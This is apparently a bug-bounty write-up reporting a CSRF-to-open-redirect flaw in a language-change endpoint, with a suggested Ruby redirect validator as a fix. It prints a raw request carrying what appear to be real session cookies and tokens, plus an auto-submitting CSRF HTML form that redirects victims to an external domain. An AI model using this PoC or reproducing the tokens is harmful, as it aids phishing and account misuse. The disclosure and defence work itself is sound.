CSRF leads to Open redirect

João Victor - Jun 5 - - Dev Community

Reward: $15

Overview of the Vulnerability
Open redirects occur when an application accepts unvalidated user input as the target of a redirection. The input causes a redirection to an external domain, which lets an attacker send a user to a malicious site. An open redirect was identified which undermines users' ability to trust legitimate web pages. An attacker can send a phishing email containing a link with the legitimate business name in the URL, and the user will be redirected from the legitimate web server to any external domain. Users are less likely to notice the subsequent redirect to a different domain when an authentic URL with a valid SSL certificate is used in the phishing link.
This type of attack is also a precursor for more serious vulnerabilities such as Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), or successful phishing attempts where an attacker can harvest users' credentials or gain users' OAuth access by relaying them through an Open Redirection, to a server they control (and can see the inbound requests from).

Business Impact
Open redirects can result in reputational damage for the business as customers' trust is negatively impacted by an attacker sending them to a phishing site to extract login credentials, or coercing them to send a financial transaction.

Steps to Reproduce
Copy and paste the request below into Burp Suite, use the "Generate CSRF PoC" functionality to create an HTML page, and open that page in the browser (proxied through the same Burp instance).

Request

POST /account/change_language HTTP/2
Host: site.com
Cookie: anon-device-id=4c27c635-6a6f-488f-b9a2-9f29173ff515; __cf_bm=Rac7hxpK8o94OYuHBu0gHix5xW0o11y2VhCwxxB_FR4-1707166647-1-AY6CLDec/7yODhPtCT3RC8iWE1Y6m7OqSf1VTqUO7pToGWcrBI9nnOYtOtQ1q4IiaLJ/vu3GKRnCEJyPWMrGaEw=; _mfp_session=kBbELYGofqGXJmZg0zIGaRo5jp7GSfjdTL6s34tbquYJoS4J1VYF1cPZkd6x2Z4xx8R7OKNpX6OJOndQS%2BN4G%2By0pbfitT5oXfov74Cp89zjaFAtX5s7ER0iMSrpbLnlK2jKRHxyusVX2AvU9v5fGc5ApZM4PL3NNdNsmqcxawJcMInSweGvPuOyFMPVYZnsSvkvWS0ARSviiGtwV%2BVM3LlRaG%2F4TgfDEiovbD%2BaszqwpTJntbX9%2Bb%2F3KjwFwitYeifofA8tvKjngXhky36cBVNBDhaToZwxIFnHZp07zLv%2FaHWEKJV4aV11Y3hT%2FGzfJrJjttWtMJicou7FDNX3eXmHhUkJ8zDX22eLGUVTu6w%3D--6me1Z0vPivn%2BoJTV--XkmHgGy679Gl%2FKNsddY7Cw%3D%3D; __Host-next-auth.csrf-token=a139928ae57b8911a5892a7866026aa63815d65196e4e5c6218aaceabb9d4c8d%7C4c4e2344fbf4063da52b2f3ec8315251ff45a9a1bf6e3dfa6018aa87d031a820; __Secure-next-auth.callback-url=https%3A%2F%2Fwww.myfitnesspal.com; AMP_MKTG_2746a27a28=JTdCJTdE; sp_gam_npa=false; dnsDisplayed=undefined; ccpaApplies=true; signedLspa=undefined; _sp_su=false; cf_clearance=xKv4h6PVvCdNz7Ru5gaJgKtAYmWXoaflj0xDqSOggT0-1707166524-1-AWvQd7Iq4gjsZKptQAw3Q+5trsYPEFKOazWRqcbbdG7Z5Wurf9+pCIlWRXfiNiuMG3qUKUj2euDmAeHb2mor0To=; AMP_2746a27a28=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJlNWQwMzQ0My0yZTdmLTQ0YmItOTRlNy0zMjllNDI1NGNjZTAlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzA3MTY2NTIwNjEwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTcwNzE2NjU0NTAxMSUyQyUyMmxhc3RFdmVudElkJTIyJTNBNSU3RA==; ccpaConsentAll=true; ccpaReject=false; consentStatus=consentedAll; ccpaUUID=215fdb39-e2eb-4b5e-9042-6f2987093e4b; consentUUID=05f64a74-d7ed-4569-8d6d-303333bf8b4b; _dd_s=logs=0&expire=1707167476513&rum=2&id=fb0f58b6-9182-4e3e-92d0-04445647a54f&created=1707166516408; language_setting=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

authenticity_token=%2BpU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN%2BdztJQjvJuWkCsTOPQ==&originating_path=http://www.c4ng4c31r0.com%3F&preference[language_setting]=en

CSRF HTML

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://site.com/account/change_language" method="POST">
      <input type="hidden" name="authenticity&#95;token" value="&#43;pU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN&#43;dztJQjvJuWkCsTOPQ&#61;&#61;" />
      <input type="hidden" name="originating&#95;path" value="http&#58;&#47;&#47;www&#46;c4ng4c31r0&#46;com" />
      <input type="hidden" name="preference&#91;language&#95;setting&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
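
The fix on the server side is to stop treating `originating_path` as a trusted redirect target. The following is an added example, not the reporter's PoC and not the affected site's code: a small Ruby validator (the form's `authenticity_token` and `preference[language_setting]` names are typical of a Rails app, but the check is framework-independent) that only allows a single-slash relative path or an absolute http(s) URL whose host is on a constructed allowlist. `ALLOWED_HOSTS`, `safe_redirect_target` and the `evil.example` hosts are assumptions for the example; the `http://www.c4ng4c31r0.com?` value is the one from the request above.

```ruby
# Added example (not the reporter's or the site's code): validate a
# post-action redirect parameter such as originating_path so that it can
# never leave the site. ALLOWED_HOSTS is a hypothetical allowlist.
require "uri"

ALLOWED_HOSTS = %w[site.com www.site.com].freeze

# Returns a redirect target that stays on this site, or +fallback+.
#
# Accepted:
#   - a relative path starting with exactly one "/" (not "//", not "/\")
#   - an absolute http(s) URL whose host is on ALLOWED_HOSTS
# Everything else (other schemes, foreign hosts, protocol-relative URLs,
# userinfo tricks, control characters) is replaced by +fallback+.
def safe_redirect_target(value, fallback: "/")
  return fallback if value.nil?
  s = value.to_s.strip
  return fallback if s.empty?

  # Control characters and embedded whitespace can confuse parsers and browsers.
  return fallback if s.match?(/[\x00-\x1f\x7f\s]/)
  # Browsers normalise "/\evil.example" to "//evil.example"; refuse backslashes.
  return fallback if s.include?("\\")

  if s.start_with?("/")
    # Protocol-relative "//evil.example" has no scheme but still names a host.
    return fallback if s.start_with?("//")
    return s
  end

  # Anything else must be an absolute URL with an allowlisted host.
  uri = begin
    URI.parse(s)
  rescue URI::InvalidURIError
    return fallback
  end
  return fallback unless %w[http https].include?(uri.scheme.to_s.downcase)
  return fallback unless uri.host && ALLOWED_HOSTS.include?(uri.host.downcase)
  # "https://site.com@evil.example/" parses with host evil.example, but reject
  # any userinfo anyway so a lookalike prefix can never pass review.
  return fallback if uri.userinfo
  s
end

if __FILE__ == $0
  # Constructed sample inputs, including the value from the report above.
  ["http://www.c4ng4c31r0.com?", "//evil.example", "/\\evil.example",
   "javascript:alert(1)", "/account", "https://www.site.com/account"].each do |v|
    puts "#{v.inspect} -> #{safe_redirect_target(v).inspect}"
  end
end
```

With this in place the CSRF'd POST still changes the language preference, but the attacker-supplied `originating_path` collapses to `/` and the victim never leaves the site. Independently of the redirect check, the `authenticity_token` sent with this form should be verified server-side against the user's session so that a cross-site POST is rejected outright; on Rails 7 or newer, `config.action_controller.raise_on_open_redirects = true` additionally makes `redirect_to` raise on any external host unless the call passes `allow_other_host: true`.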

PoC:

[Screenshot: generating the CSRF PoC]

[Screenshot: accessing the URL generated with the PoC]

[Screenshot: redirecting]

Reward/Status:

[Screenshot: reward/status]
